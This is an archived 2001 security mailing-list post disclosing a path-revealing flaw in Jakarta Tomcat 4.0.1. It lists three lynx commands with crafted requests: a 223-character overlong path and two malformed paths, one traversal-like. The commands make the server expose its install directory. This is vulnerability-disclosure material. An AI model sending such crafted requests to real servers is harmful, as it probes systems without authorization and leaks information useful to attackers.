Hi

From: analysist (analysistat_private)
Date: Thu Nov 22 2001 - 01:32:20 PST

Next message: Andrea Arcangeli: "Re: SuSE 7.3 : Kernel 2.4.10-4GB Bug"

Previous message: securityfocus.com.drewat_private: "Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hello,

It looks like jakarta-tomcat-4.0.1 has a path revealing vulnerability.
On submiting an unusually long request(more than 222 bites) or a special crafted request, we can
get the web server's install path.

How to produce it
----------------------
$ lynx http://localhost:8080/`perl -e 'print "A" x 223'`.jsp
$ lynx http://localhost:8080/:/x.jsp
$ lynx http://localhost:8080/~../x.jsp

Tested version 
-----------------------   
Jakarta Tomcat v4.0.1
    Microsoft Windows 2000

I sent this information to the vendor a week ago, but i have not received any reply!:( 

Best Regards

analysistat_private 
NSFOCUS Security Team <http://www.nsfocus.com>

Next message: Andrea Arcangeli: "Re: SuSE 7.3 : Kernel 2.4.10-4GB Bug"
Previous message: securityfocus.com.drewat_private: "Re: NSFOCUS SA2001-07 : ActivePerl PerlIS.dll Remote Buffer Overflow Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Nov 23 2001 - 14:37:23 PST